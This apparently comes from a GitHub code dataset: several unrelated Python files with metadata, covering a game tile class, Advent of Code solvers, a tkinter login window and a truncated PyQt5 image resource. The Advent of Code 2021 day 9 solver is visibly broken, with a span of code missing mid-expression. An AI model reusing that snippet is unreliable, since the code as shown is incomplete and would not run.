self.y = y\n self.weapon = weapon\n self.texture = resources.weaponBoxImage\n self.background = rabbyt.sprites.Sprite(texture=self.texture, x=self.x, y=self.y)\n if self.weapon:\n self.weapon.x = self.x+self.spacing\n self.weapon.y = self.y-self.spacing\n\n def render(self):\n self.background.render()\n if self.weapon:\n self.weapon.render()\n","repo_name":"segerphilip/sofdesfinal","sub_path":"Classes/Tiles.py","file_name":"Tiles.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71683646247","text":"from itertools import permutations\n\nfrom intcode import run, input_to_codes\nfrom util import read_input\n\n\ndef get_digits(i):\n return [int(x) for x in str(i)]\n\n\ndef get_signals(signal_range: range):\n return list(permutations(signal_range))\n\n\ndef list_to_int(lst: list) -> int:\n return int(''.join(lst))\n\n\ndef get_thruster_signal(inst, phase, copy_sequence=True):\n p = iter(phase)\n c = next(p), 0\n thrust = 0\n for i in range(5):\n seq = copy_sequence and list(inst) or inst\n thrust = run(seq, iter(c))\n try:\n c = next(p), thrust\n except StopIteration:\n pass\n return thrust\n\n\ndef get_thruster_signal_feedback(inst, phase):\n amps = [list(inst) for _ in range(5)]\n thrust = 0\n for amp in amps:\n thrust = get_thruster_signal(amp, phase, copy_sequence=False)\n for amp in amps:\n thrust = run(amp, thrust)\n return thrust\n\n\ndef get_max_thruster_signal(sequence: list, signal_range: range) -> int:\n signals = get_signals(signal_range)\n max_signal = 0\n for phase in signals:\n signal = get_thruster_signal(list(sequence), phase)\n max_signal = signal > max_signal and signal or max_signal\n return max_signal\n\n\ndef run_signal_to_halt(sequence: list, signal_range: range) -> int:\n signals = get_signals(signal_range)\n max_signal = 0\n for phase in signals:\n signal = get_thruster_signal_feedback(sequence, phase)\n max_signal = signal > max_signal and signal or max_signal\n return max_signal\n\n\ndef part_one(inst):\n print(get_max_thruster_signal(list(inst), signal_range=range(5)))\n\n\ndef part_two(inst):\n print(run_signal_to_halt(list(inst), signal_range=range(5, 10)))\n\n\nif __name__ == '__main__':\n instructions = input_to_codes(read_input('input.txt'))\n part_one(instructions)\n part_two(instructions)\n","repo_name":"andyhoneycutt/advent-of-code","sub_path":"python/2019/day07/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20120647242","text":"import sys\n\nsys.path.append(\"../ariadna\")\nimport tkinter as tk\nfrom vista.ventana_base import VentanaBase\nimport settings as ck\n\n\nclass VentanaLogin(tk.Tk, VentanaBase):\n USUARIOS = ck.USUARIOS\n\n def __init__(self, version):\n super().__init__()\n self.version = version\n\n self.ancho = 300\n self.alto = 120\n self.geometry(self.centrar_ventana(self, self.ancho, self.alto))\n\n self.title(\"Login\")\n self.configure(bg=self.color_back)\n\n # Crear etiquetas y campos de entrada para usuario y contraseña\n self.etiqueta_usuario = tk.Label(\n self, text=\"Usuario:\", background=self.color_back, fg=\"white\"\n )\n self.etiqueta_usuario.pack()\n self.user = tk.StringVar()\n self.user.set(\"\")\n self.entry_usuario = tk.Entry(self, textvariable=self.user)\n self.entry_usuario.pack()\n\n self.etiqueta_contrasena = tk.Label(\n self, text=\"Contraseña:\", background=self.color_back, fg=\"white\"\n )\n self.etiqueta_contrasena.pack()\n self.entry_contrasena = tk.Entry(self, show=\"*\") # Para ocultar la contraseña\n self.entry_contrasena.pack()\n\n # Botón de login\n self.boton_login = tk.Button(\n self, text=\"Ingresar\", command=lambda: self.verificar()\n )\n self.boton_login.pack()\n self.entry_usuario.bind(\"\", lambda event: self.verificar())\n self.entry_contrasena.bind(\"\", lambda event: self.verificar())\n self.mainloop()\n\n def verificar(self):\n usuario = self.entry_usuario.get()\n contrasena = self.entry_contrasena.get()\n\n # Verificar si el usuario y la contraseña son válidos (ejemplo sencillo)\n if usuario in self.USUARIOS and contrasena == self.USUARIOS[usuario]:\n self.destroy() # Destruir la ventana de logueo\n self.abrir_ventana_principal(usuario) # Abrir GUI principa\n else:\n self.mostrar_mensaje_advertencia(\"Usuario o contraseña inválidos\")\n\n def abrir_ventana_principal(self, usuario):\n from controladores.controlador_GUI import Aplicacion\n\n app = Aplicacion(self.version, usuario)\n","repo_name":"simon1494/Ariadna","sub_path":"vista/ventana_login.py","file_name":"ventana_login.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36133905202","text":"import aocd\nimport numpy as np\ns= aocd.get_data(day=9,year=2021).splitlines()\ns = np.array([[int(c) for c in b] for b in s])\n\ndef neighbor(y,x,without=False):\n a = []\n for q,e in [(y+1,x),(y-1,x),(y,x-1),(y,x+1)]:\n if 0<=q0],return_counts=1)\nh.sort()\nprint(np.prod(h[-3:]))","repo_name":"MockaWolke/Advent_of_Code_2021","sub_path":"day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17971735303","text":"# -*- coding: utf-8 -*-\n\n# Resource object code\n#\n# Created by: The Resource Compiler for PyQt5 (Qt v5.13.0)\n#\n# WARNING! All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore\n\nqt_resource_data = b\"\\\n\\x00\\x00\\x28\\x16\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x61\\x00\\x00\\x00\\x69\\x08\\x02\\x00\\x00\\x00\\xa5\\x37\\xda\\x99\\\n\\x00\\x00\\x00\\x01\\x73\\x52\\x47\\x42\\x00\\xae\\xce\\x1c\\xe9\\x00\\x00\\x00\\\n\\x04\\x67\\x41\\x4d\\x41\\x00\\x00\\xb1\\x8f\\x0b\\xfc\\x61\\x05\\x00\\x00\\x00\\\n\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x0e\\xc3\\x00\\x00\\x0e\\xc3\\x01\\xc7\\x6f\\\n\\xa8\\x64\\x00\\x00\\x27\\xab\\x49\\x44\\x41\\x54\\x78\\x5e\\xed\\x7d\\x07\\x7c\\\n\\x54\\x55\\xf6\\xff\\x04\\x11\\x56\\x74\\x57\\x5d\\xb1\\xac\\x15\\x97\\x9a\\x02\\\n\\xea\\xfe\\x77\\x57\\x05\\xd2\\x26\\xd3\\xd3\\x33\\x99\\x3e\\xc9\\xcc\\x64\\x5a\\\n\\x0a\\x35\\x10\\x08\\x52\\x45\\xaa\\x28\\xd6\\x45\\x14\\x0b\\x8a\\x82\\xa8\\x08\\\n\\xca\\x2a\\x01\\x03\\x29\\x24\\x20\\x88\\x40\\x20\\x74\\x42\\x08\\xe9\\x09\\x09\\\n\\x29\\x93\\x69\\x6f\\x66\\xde\\xef\\x9c\\xfb\\x86\\x90\\x84\\x90\\x20\\x84\\xbf\\\n\\xfc\\xfe\\x7f\\xcf\\xe7\\x70\\xf3\\xe6\\xbd\\x3b\\xef\\xde\\xf7\\x7d\\xa7\\xde\\\n\\x32\\xb0\\xe8\\x3f\\xa8\\x37\\xfa\\x03\\xa3\\xde\\xe9\\x0f\\x8c\\x7a\\xa7\\x3f\\\n\\x30\\xea\\x9d\\xfe\\xc0\\xa8\\x77\\xfa\\x03\\xa3\\xde\\xe9\\x0f\\x8c\\x7a\\xa7\\\n\\x3f\\x30\\xea\\x9d\\xfe\\xc0\\xa8\\x77\\xfa\\x03\\xa3\\xde\\xe9\\xb6\\xc3\\xc8\\\n\\x43\\x7b\\xdc\\x1e\\x17\\xed\\xa6\\x68\\xda\\x45\\xd3\\x6e\\xfc\\x0c\\x27\\x68\\\n\\x60\\xef\\x65\\x52\\xc2\\x09\\xa8\\xe5\\x76\\xc1\\x55\\x72\\xe2\\x96\\xd2\\x6d\\\n\\x87\\x11\\xa0\\xe2\\xf2\\x50\\x34\\x45\\xd1\\x80\\x80\\xc7\\x0d\\x40\\x39\\xdd\\\n\\xf0\\x87\\x06\\xcc\\x80\\x1d\\xc0\\x1e\\x1a\\xa0\\x71\\x7a\\x3c\\x56\\xb7\\x9b\\\n\\x72\\xb9\\x3c\\x2e\\x80\\xf2\\xd6\\xd2\\xed\\xa7\\x6b\\x28\\x48\\xb4\\x0d\\x04\\\n\\x05\\x9e\\xdd\\x45\\x5b\\x69\\xda\\xe6\\xbd\\x00\\x44\\xd9\\x69\\xbb\\x9d\\x76\\\n\\xd9\\x69\\xda\\x09\\x15\\x1d\\xb4\\x8b\\xa2\\x5c\\x28\\x6e\\xb7\\x96\\x6e\\x3f\\\n\\x5d\\x03\\xa9\\xa1\\x40\\x46\\x68\\x0b\\x51\\x2c\\xb7\\xc3\\xe2\\xfc\\xb5\\xa0\\\n\\x61\\xd5\\xbb\\xe5\\xc9\\x93\\x2e\\xc4\\xca\\x9a\\xd5\\x1a\\x47\\xe6\\x6c\\xeb\\\n\\x86\\x75\\xce\\xba\\xf3\\x20\\x56\\x4e\\x06\\xca\\x5b\\x4c\\xb7\\xa1\\xae\\xd1\\\n\\x2e\\xa2\\x5a\\x28\\x46\\xa7\\x8b\\x1a\\xd3\\xd3\\x6b\\xfd\\x03\\xaa\\x87\\x0e\\\n\\xab\\x1f\\x36\\xa2\\xea\\xa9\\xa7\\x2a\\x9f\\x7e\\xb2\\x6a\\xe8\\xb0\\xda\\x27\\\n\\x86\\x57\\x0b\\xf9\\x75\\x5b\\x3e\\x77\\xda\\xac\\xff\\x8b\\xed\\x11\\x74\\xbd\\\n\\x63\\xef\\x99\\x8f\\x97\\x4f\\x76\\xfc\\xd4\\x95\\x41\\x8e\\x9c\\x2e\\x0f\\xa8\\\n\\x98\\x73\\x6f\\xe1\\x05\\x51\\x6c\\xe5\\x93\\x4f\\xd6\\xfa\\x3d\\x5d\\x3d\\x7a\\\n\\x44\\xa5\\xdf\\xb0\\x5a\\x7f\\xdf\\x7a\\x3f\\xbf\\xda\\x80\\x31\\xf5\\x7e\\xa3\\\n\\x2e\\x0d\\x79\\xbc\\x74\\xd8\\xc8\\x8b\\x4b\\x96\\xd2\\x6d\\x2d\\xf8\\x35\\x80\\\n\\x15\\xbf\\xef\\x01\\x6a\\xbf\\xd5\\x65\\x26\\x97\\xe0\\xbc\\xf7\\xd0\\x4b\\x57\\\n\\xae\\xf5\\x46\\x7d\\x8f\\x11\\x34\\x6c\\x77\\x7b\\x1c\\xe0\\x76\\xe0\\x79\\x91\\\n\\x5c\\xc0\\xc4\\x0f\\x31\\xee\\x09\\xae\\x13\\x4b\\x73\\x0d\\x86\\x2f\\x81\\x12\\\n\\x59\\xca\\x4e\\x9f\\x17\\x04\\x96\\x0d\\x19\\x55\\xe3\\xeb\\x5b\\x1b\\xe0\\x57\\\n\\xe3\\xef\\x0f\\x5c\\x4b\\xb8\\x7a\\x74\\x40\\xfd\\x98\\xd1\\x8d\\x7e\\xfe\\x55\\\n\\x23\\x47\\x9c\\x1a\\xfe\\x44\\xcb\\xdb\\x4b\\xc0\\x88\\xbb\\x9d\\xb4\\x93\\x72\\\n\\x3b\\x29\\x1b\\xd8\\xf0\\x2e\\x37\\x64\\xda\\x84\\xde\\x30\\xa8\\x78\\xa0\\x2a\\\n\\x4d\\x41\\x35\\xca\\xed\\x06\\xc3\\x0f\\xa5\\xb7\\xdf\\xd7\\xa6\\x5b\\x80\\x91\\\n\\x07\\x5c\\x8d\\xcb\\xe3\\x76\\xb9\\x9c\\x0e\\xf8\\x07\\x3d\\xb9\\xee\\x17\\x76\\\n\\x85\\x6a\\xa7\\x65\\x94\\x0c\\x7d\\xb0\\xc5\\x37\\xa0\\xd5\\xf7\\x99\\xea\\x00\\\n\\x3f\\x06\\x1d\\x86\\x2b\\x02\\x7c\\xab\\x03\\xfc\\xeb\\x47\\xf8\\x36\\xfa\\x8f\\\n\\xbe\\x30\\x72\\xe8\\xd9\\xe7\\x5f\\x68\\x3e\\xb8\\x17\\xbe\\xd2\\xfb\\xb3\\x7a\\\n\\x09\\xe0\\xb1\\x11\\x70\\x28\\xb7\\x87\\x42\\xd7\\xd9\\x1b\\xdd\\x02\\x8c\\x40\\\n\\x70\\x28\\x1b\\x3a\\x1f\\x70\\xe1\\x84\\x28\\x97\\xbb\\xaa\\xba\\xee\\x68\\xf1\\\n\\xf1\\x83\\x87\\x8e\\x1c\\x3c\\x54\\xf4\\xcb\\xe1\\x63\\xfb\\x8b\\x8e\\x5f\\x93\\\n\\x8b\\x4f\\x1d\\xd9\\xba\\xb5\\xf6\\xb9\\xe7\\x6a\\x47\\x3e\\x72\\xd1\\x6f\\x78\\\n\\x9d\\x7f\\x40\\x4d\\x80\\x7f\\x47\\xae\\x1c\\xed\\x5f\\x33\\x26\\xa0\\xd1\\x3f\\\n\\xe0\\xe2\\x08\\xdf\\x06\\x5f\\xbf\\x86\\x21\\xc3\\x4b\\xa7\\x4c\\x3a\\x50\\x5c\\\n\\xb4\\xff\\xc8\\xb1\\x9f\\x8f\\x1c\\x3e\\x70\\xf8\\x48\\x97\\x1b\\x1e\\x38\\x5a\\\n\\xbc\\xff\\x70\\xd1\\xbe\\xc3\\x45\\xbf\\x1c\\x39\\x5a\\x7c\\xa6\\xa4\\xbe\\xf1\\\n\\x12\\xd3\\x2b\\x24\\xec\\x61\\xef\\xef\\xef\\x56\\xd8\\x23\\xd0\\x16\\xf0\\xce\\\n\\xf8\\x7e\\xea\\x1a\\x9b\\x36\\x6e\\xf9\\x71\\x72\\xe6\\x42\\x95\\x61\\x4a\\x9c\\\n\\xda\\x14\\x9f\\x90\\x1c\\xa7\\x32\\x45\\x27\\xa4\\x44\\x27\\xa6\\x5e\\x83\\xd3\\\n\\xf8\\xba\\xd4\\xd5\\x7c\\x91\\xc5\\x6f\\x58\\xcd\\x98\\x51\\x15\\xa3\\x7d\\xcb\\\n\\x9e\\xf1\\xaf\\xf5\\xbb\\x22\\x44\\xc0\\xd5\\xa3\\xfd\\x2b\\xfd\\x46\\xd5\\x8d\\\n\\x0e\\xa8\\xf3\\xf7\\xaf\\xf7\\x0b\\x68\\xf1\\x1d\\x76\\xe2\\xd9\\x7f\\x69\\xe4\\\n\\x4a\\xb1\\x26\\x35\\x4a\\x63\\x8e\\x49\\x4c\\xee\\x72\\x4f\\x71\\x62\\x32\\xc3\\\n\\x71\\x09\\x66\\xa9\\x6e\\x82\\x26\\x25\\x7d\\xd1\\x6b\\xef\\x16\\xee\\x3f\\xec\\\n\\x44\\xd7\\x80\\x26\\x80\\xf4\\xb9\\x27\\xba\\x05\\x18\\xa1\\xdd\\xc4\\x86\\x77\\\n\\xef\\x3f\\xac\\x9f\\x9c\\xc9\\x8e\\x52\\xb2\\x63\\x92\\x38\\x62\\x23\\x5f\\x9a\\\n\\xcc\\x93\\x9a\\x81\\xb9\\x52\\x23\\x47\\xd6\\x3d\\xb3\\xe5\\x26\\xb6\\x54\\xff\\\n\\xdf\\x7f\\x07\\xdb\\x47\\x3e\\x7d\\x61\\xcc\\x3f\\x6b\\x7d\\x47\\x57\\xfb\\x8f\\\n\\xaa\\xee\\x00\\x10\\x70\\x3d\\x94\\x01\\x01\\x15\\x01\\x7e\\x15\\xa3\\xfd\\xab\\\n\\x46\\x07\\x5c\\x7c\\x66\\x68\\xd9\\x33\\xff\\x67\\x26\\x4f\\x3e\\x4e\\x6e\\x16\\\n\\x8a\\x8d\\x41\\x5d\\xee\\x29\\x35\\x70\\xc5\\x26\\xa1\\x24\\x85\\x1f\\x6f\\x16\\\n\\xc4\\x27\\x73\\xe3\\x4c\\x9c\\x78\\x63\\x50\\xa4\\x5a\\x18\\xaf\\x5d\\xfc\\xda\\\n\\xaa\\x8a\\x9a\\x7a\\xa6\\xcb\\x3d\\x53\\x1f\\x60\\x44\\x0c\\xb3\\x9b\\x20\\x03\\\n\\x26\\xd1\\xfb\\x5a\\x72\\xf6\\xfc\\x1a\\xa3\\x4e\\x0d\\x8a\\xd1\\x70\\xe4\\xa6\\\n\\x70\\x85\\x41\\x28\\x4b\\x0a\\x57\\x9a\\x84\\xca\\x64\\x81\\x2a\\x55\\x28\\x37\\\n\\x89\\xae\\xc1\\x3c\\x85\\x39\\x4a\\x6e\\xfc\\xf1\\x79\\x76\\x93\\xef\\x13\\x35\\\n\\x60\\xaa\\x47\\x07\\x5c\\x1a\\xe5\\x5b\\x03\\xbe\\xac\\x23\\x4c\\xe4\\x23\\x63\\\n\\xc5\\xe1\\x52\\xcd\\x33\\x01\\xb5\\xfe\\xa3\\x5f\\x15\\xca\\x82\\x54\\x93\\xe3\\\n\\xe2\\x34\\x5c\\xa5\\xb1\\xd3\\x3d\\x15\\x50\\x9a\\xc3\\x15\\xc9\\x11\\x4a\\x64\\\n\\x38\\xc3\\x97\\x19\\x45\\x2a\\x78\\x5b\\xfa\\xc0\\x08\\x85\\x7e\\xda\\x82\\x73\\\n\\xd5\\x0d\\xd0\\x5b\\x30\\x4f\\x10\\x68\\x81\\x7d\\x02\\x23\\x7f\\x35\\xf5\\x01\\\n\\x46\\x8c\\xd4\\x40\\xc9\\x80\\x05\\xc7\\x47\\x4f\\x9d\\x96\\xeb\\x52\\xb9\\x71\\\n\\x3a\\xa1\\x32\\x45\\x90\\x90\\x22\\x50\\x40\\xcf\\x0c\\x7c\\xb9\\x49\\xa8\\x4e\\\n\\x01\\x14\\x78\\x72\\x93\\x40\\x61\\xe6\\x77\\xc7\\x5c\\xa5\\x99\\x0f\\x18\\xbd\\\n\\xc0\\xb7\\xf8\\x3d\\x5d\\xf3\\x8c\\x2f\\x68\\x53\\x5d\\x80\\x6f\\x5d\\x00\\xa0\\\n\\xd0\\x01\\xa3\\x0e\\x8c\\xd6\\xca\\x77\\x44\\x93\\xdf\\xe8\\xcc\\x28\\x71\\x90\\\n\\x32\\x4d\\x28\\x4f\\xe2\\xa9\\x52\\x3a\\xde\\x10\\x1a\\x12\\xc0\\x8b\\xc1\\x63\\\n\\x7c\\x43\\xc8\\x0a\\x53\\x84\\x3a\\x05\\x4a\\x81\\xdc\\x18\\x18\\xa9\\x9a\\xbb\\\n\\xfc\\xed\\xd6\\x36\\x30\\xe1\\xd0\\x6d\\xc8\\x6c\\x6e\\x19\\x46\\x40\\x44\\x86\\\n\\x90\\xe0\\xd8\\xe1\\x74\\xce\\x7a\\x65\\x49\\x58\\x94\\x22\\x42\\x9e\\x0c\\xb8\\\n\\xf0\\x14\\x06\\xbe\\x2a\\x95\\xaf\\x4c\\x0d\\x8d\\x4f\\xf2\\xa2\\x23\\x37\\xf2\\\n\\x64\\xdd\\x33\\x68\\x47\\xa8\\xc2\\xf8\\xe5\\x38\\x51\\xcb\\xa8\\xa1\\x55\\xa3\\\n\\xfd\\x1a\\x7c\\xfd\\xcb\\x47\\x8f\\xea\\x62\\xb3\\x3b\\x73\\x40\\x53\\xc0\\xf0\\\n\\x72\\xdf\\x67\\x12\\x62\\xe2\\x42\\x95\\xa6\\x20\\xa5\\x91\\xab\\x48\\xe9\\x7a\\\n\\x4f\\x89\\x1e\\x4b\\x29\\x96\\xd0\\x1f\\x01\\x8a\\x92\\x01\\x00\\x22\\x6c\\x62\\\n\\xc7\\x28\\xbf\\xcb\\xca\\x66\\x1e\\x02\\x94\\x01\\x44\\x89\\x1c\\x77\\xa2\\xbe\\\n\\xc1\\x88\\x11\\x1f\\x86\\x0e\\x1c\\x2e\\xe2\\x49\\x12\\x78\\xf1\\x3a\\x91\\x3c\\\n\\x45\\x20\\x37\\x8b\\xd4\\x26\\x2e\\xb1\\x0b\\x11\\x6a\\x73\\xb4\\xda\\x14\\xab\\\n\\x32\\xc4\\xaa\\x8d\\x31\\xaa\\x6b\\xb2\\x40\\x6d\\x5e\\x1e\\x1e\\x5b\\x35\\x7a\\\n\\x54\\x5d\\xc0\\x98\\x1a\\xff\\x80\\x8a\\x67\\x7d\\xbb\\xc8\\x4e\\x27\\x0e\\x08\\\n\\x68\\xf0\\x7d\\x3a\\xe7\\xf9\\xf1\\x32\\xb5\\x21\\x22\\x41\\xcf\\x57\\x19\\xa3\\\n\\xd5\\xe6\\x2e\\x37\\x8c\\x56\\x1a\\x62\\x13\\x4c\\x50\\x02\\x47\\xc8\\x75\\x1c\\\n\\xb1\\x06\\xe4\\x3a\\x5c\\x85\\x02\\x25\\x52\\x26\\x87\\xc6\\x26\\x4c\\x9e\\xbd\\\n\\xc8\\xe6\\x40\\x17\\x8c\\xa1\\xdc\\x65\\x5b\\xd1\\x91\\xfa\\x4c\\x8e\\xda\\x8f\\\n\\x3e\\xfe\\xec\\xf3\\xe0\\x58\\x95\\x48\\x09\\x76\\x07\\x44\\xda\\x2c\\x54\\x26\\\n\\x09\\xe4\\xfa\\x65\\xff\\xf9\\x64\\xdf\\xe1\\xe3\\xc5\\xa7\\xce\\x16\\x1f\\x3b\\\n\\x5e\\x7c\\xe2\\xd4\\xd1\\x13\\xa7\\xaf\\xc5\\x87\\x4f\\x95\\x9e\\x38\\x90\\xdf\\\n\\xc0\\x19\\x7b\\xf1\\xef\\xa3\\xce\\x3d\\x1b\\x50\\x1d\\x30\\xb2\\xbe\\xb3\\x5f\\\n\\x03\\x06\\x1d\\xf4\\x1e\\xc3\\xa5\\x61\\x8f\\x97\\xaf\\x7a\\xf7\\xd0\\xc9\\xb2\\\n\\xa2\\x53\\x67\\x8f\\x9f\\x28\\x3d\\x7a\\xb2\\xd3\\xcd\\x8b\\x4f\\x9e\\x39\\x7a\\\n\\xe2\\xcc\\xe1\\xe2\\x13\\xcc\\xc1\\x4f\\x39\\x79\\xe6\\xe9\\xf3\\xd8\\xf1\\x49\\\n\\x00\\x90\\x50\\x61\\x84\\x32\\x4c\\x92\\x14\\xa3\\x49\\x2b\\x3e\\x55\\xc2\\xf4\\\n\\x9e\\x94\\x5d\\xa9\\x2f\\x6c\\x36\\xde\\x1b\\x03\\x58\\x38\\x06\\xb0\\x5e\\x5e\\\n\\xbe\\x32\\x34\\x4e\\x0b\\x96\\x28\\x1c\\x54\\x4c\\x66\\x0c\\x89\\x49\\xc8\\x7c\\\n\\x79\\x79\\x1b\\x79\\x51\\xd7\\x49\\xd0\\x53\\xfb\\x67\\xef\\x55\\x0e\\x0d\\xa8\\\n\\x1b\\x3e\\xb2\\xfc\\xb9\\x51\\x55\\xcf\\x82\\xa7\\x1f\\x75\\xd1\\x6f\\x54\\xad\\\n\\x9f\\x2f\\x04\\x90\\x75\\xe8\\xec\\x9e\\xad\\x1c\\x33\\xfa\\xa2\\x9f\\x5f\\xf5\\\n\\x53\\x8f\\x95\\x4b\\xe2\\xdd\\x35\\x17\\xbd\\xdf\\xbc\\x0e\\x2a\\x3a\\x51\\x12\\\n\\xaf\\x4b\\x0b\\x8d\\x05\\x69\\x32\\x8b\\x94\\x26\\x1e\\x18\\x4a\\xa9\\xfe\\xc7\\\n\\xec\\x1c\\xb8\\x04\\x56\\xa9\\x5b\\x90\\xfa\\x06\\x23\\x14\\x51\\x62\\xef\\xa0\\\n\\x8d\\xf9\\xcb\\xde\\x64\\xc7\\xc1\\x8b\\x02\\x61\\x4e\\x16\\xc8\\x93\\xd9\\xb1\\\n\\xda\\xcf\\xbe\\xdc\\x84\\x97\\x20\\xc7\\x80\\x08\\x9c\\xe4\\x23\\x3d\\x10\\xdc\\\n\\xc9\\xe9\\xa2\\x29\\x5b\\x73\\xfd\\x9c\\x39\\x8d\\x8f\\x3c\\x7d\\x71\\xd8\\x13\\\n\\x8d\\xe0\\xfe\\x7d\\x47\\x96\\x8f\\xf1\\xab\\x7e\\x66\\xf4\\x45\\xff\\x80\\x06\\\n\\xbf\\x7f\\x9e\\x79\\xc6\\xaf\\x6a\\xcc\\x93\\xf5\\x8f\\x3f\\x5e\\x1e\\x26\\xa0\\\n\\xf6\\x1e\\x80\\xfb\\x41\\xbe\\x03\\xe1\\x3c\\x24\\x32\\xbd\\x86\\xdb\\x6d\\x36\\\n\\x5b\\xea\\xf4\\xd9\\x5c\\xa9\\x9e\\x8f\\x3d\\x34\\xf2\\x65\\xfa\\xa0\\x08\\xf9\\\n\\x86\\x4d\\xdf\\x31\\x57\\xbb\\x53\\xb5\\xbe\\xc4\\x08\\x25\\x05\\x9a\\x58\\xb0\\\n\\xbc\\x23\\x46\\xe6\\x30\\x71\\xd2\\xba\\xaf\\x36\\xe3\\x25\\xc4\\x08\\xed\\x56\\\n\\x8f\\x10\\x21\\x82\\x6e\\x8a\\x54\\xb1\\x36\\x35\\x2f\\x5d\\x52\\x11\\xf0\\x5c\\\n\\xed\\x13\\x43\\x2a\\x86\\x0f\\x3b\\x3f\\x66\\x54\\xf9\\x33\\xbe\\x35\\xfe\\xa3\\\n\\xea\\x87\\x8f\\x68\\x78\\xea\\x89\\xfa\\xc7\\x1e\\xad\\x8b\\x16\\x5b\\x7f\\x2d\\\n\\x82\\x8a\\x00\\x90\\xc3\\xe3\\x76\\xa0\\x1c\\xb8\\x71\\xfc\\xad\\x47\\x6a\\xb6\\\n\\x58\\xd2\\x32\\xe6\\x84\\xc5\\x6b\\xc1\\xc3\\x8a\\x94\\xe6\\x70\\x75\\xca\\xd8\\\n\\x70\\xc9\\x67\\x1b\\xbf\\x21\\x17\\xbb\\x85\\xe8\\xff\\x02\\x46\\x71\\xba\\xb5\\\n\\x1b\\x98\\x1e\\xb8\\xdc\\x2e\\x48\\xe9\\x7b\\x79\\xd3\\x90\\xca\\x38\\x28\\x5b\\\n\\x9b\\xd3\\xe9\\xc0\\x01\\x12\\xb7\\xb5\\x60\\x4f\\x4b\\x7a\\x6a\\x2d\\x27\\xac\\\n\\x62\\xc8\\xc8\\xda\\xc7\\x86\\x56\\x3d\\xf9\\xf7\\x9a\\x31\\xbe\\x15\\xb2\\x98\\\n\\xca\\x35\\x1f\\xb8\\xea\\xeb\\xa1\\x39\\x80\\xc6\\xc9\\x30\\x64\\xce\\x00\\x70\\\n\\x2f\\x10\\x01\\x46\\x6d\\x13\\x32\\xe6\\x85\\x49\\xb4\\x18\\x1c\\xc8\\x0c\\x20\\\n\\x4a\\xe3\\x23\\xe4\\x5f\\x7c\\xfd\\x2d\\x5c\\x42\\xc7\\xc6\\x54\\xea\\x4c\\x7d\\\n\\x63\\xb3\\x3b\\xd2\\xcb\\xaf\\xbe\\xd5\\x05\\xa3\\x75\\x5f\\xa1\\xae\\x5d\\x2f\\\n\\xb9\\x41\\xd7\\x5c\\x2d\\x50\\x38\\x29\\x50\\xba\\x16\\x90\\x27\\xda\\xd2\\x5a\\\n\\x7a\\xbc\\x25\\x6f\\x97\\x6d\\x47\\x96\\x2d\\x6b\\x6b\\xdb\\xfe\\x7c\\x47\\x63\\\n\\x15\\xa9\\x48\\x43\\x4e\\x68\\x73\\x43\\xda\\x8c\\x96\\x04\\x18\\xdc\\x2b\\xa4\\\n\\xd3\\xcc\\x6d\\xae\\x45\\xcd\\x6d\\xd6\\x09\\x33\\xe7\\x85\\xc5\\x27\\x09\\x54\\\n\\x24\\x4a\\x52\\x18\\xc7\\x09\\x25\\x9f\\x7d\\xf9\\x35\\x73\\xb5\\x5b\\x90\\xae\\\n\\x0b\\x23\\xaf\\x82\\xa0\\x55\\xf6\\xde\\xc3\\xe1\\xa2\\x5b\\xad\\x76\\x8b\\xcd\\\n\\x01\\x65\\xb3\\xd5\\xde\\x02\\xc7\\xf8\\xd1\\x09\\x07\\xf3\\x96\\xbe\\xc1\\x8e\\\n\\xd3\\xb7\\x63\\xc4\\x11\\x27\\x7d\\xf4\\xf9\\x57\\x56\\x07\\xd5\\xd2\\x66\\xb5\\\n\\xd8\\xec\\x4d\\x6d\\x50\\xd9\\x01\\x5f\\x64\\xb8\\x15\\x4a\\x3b\\x58\\x92\\x2b\\\n\\x84\\x4f\\x0a\\x2e\\xd8\\x05\\xff\\x1c\\x34\\x45\\x01\\x00\\xdd\\x6b\\x0f\\x0e\\\n\\x65\\x53\\x28\\x92\\x70\\x15\\x98\\x74\\x0d\\x3c\\x06\\x4a\\x74\\x8f\\x04\\x18\\\n\\xa5\\xcd\\x98\\xcb\\x16\\x83\\x1c\\xa1\\x3d\\x02\\xcf\\x1b\\x14\\xa9\\xf8\\xfc\\\n\\x2b\\x94\\x23\\xa0\\x6e\\xbf\\x7c\\x5d\\x18\\x81\\x16\\x91\\xd1\\x75\\x7c\\x98\\\n\\x4b\\xcd\\xad\\xab\\x3f\\xdd\\x30\\x65\\xce\\xe2\\x09\\x33\\xe6\\x4f\\xca\\x7c\\\n\\x79\\xe2\\xcc\\x05\\x93\\x5f\\x7a\\x65\\xca\\x4b\\x8b\\xa6\\xcc\\x5e\\x3c\\x69\\\n\\xd6\\xc2\\xa9\\xb3\\x17\\x49\\x75\\x13\\xf9\\x90\\x3a\\x11\\x8c\\x80\\xf9\\x32\\\n\\x53\\x62\\xf2\\xb4\\xf4\\x39\\x4b\\x26\\xcd\\x7a\\x65\\xca\\x6c\\xa8\\xb6\\x08\\\n\\x2a\\x4f\\xbe\\xc2\\xaf\\x4c\\x9e\\xbd\\x78\\xc6\\xc2\\xe5\\xef\\x7e\\xf0\\xc9\\\n\\xa1\\x23\\xc7\\x88\\x86\\x01\\x01\\x40\\x14\\x0e\\xb1\\xa0\\x8c\\xfc\\x06\\x87\\\n\\x78\\x3d\\x04\\xba\\x96\\x96\\x31\\x17\\x5c\\x3e\\x1f\\x52\\x13\\x0c\\x91\\x4c\\\n\\xe3\\xc3\\x65\\x5f\\xdc\\x3c\\x46\\xe0\\x2f\\x88\\x0c\\x7b\\x1c\\x4e\\x6a\\xd9\\\n\\xca\\x77\\x02\\xc3\\xa5\\x41\\x51\\x2a\\x76\\x5c\\x62\\x48\\x8c\\x3a\\x38\\x5a\\\n\\xc5\\x11\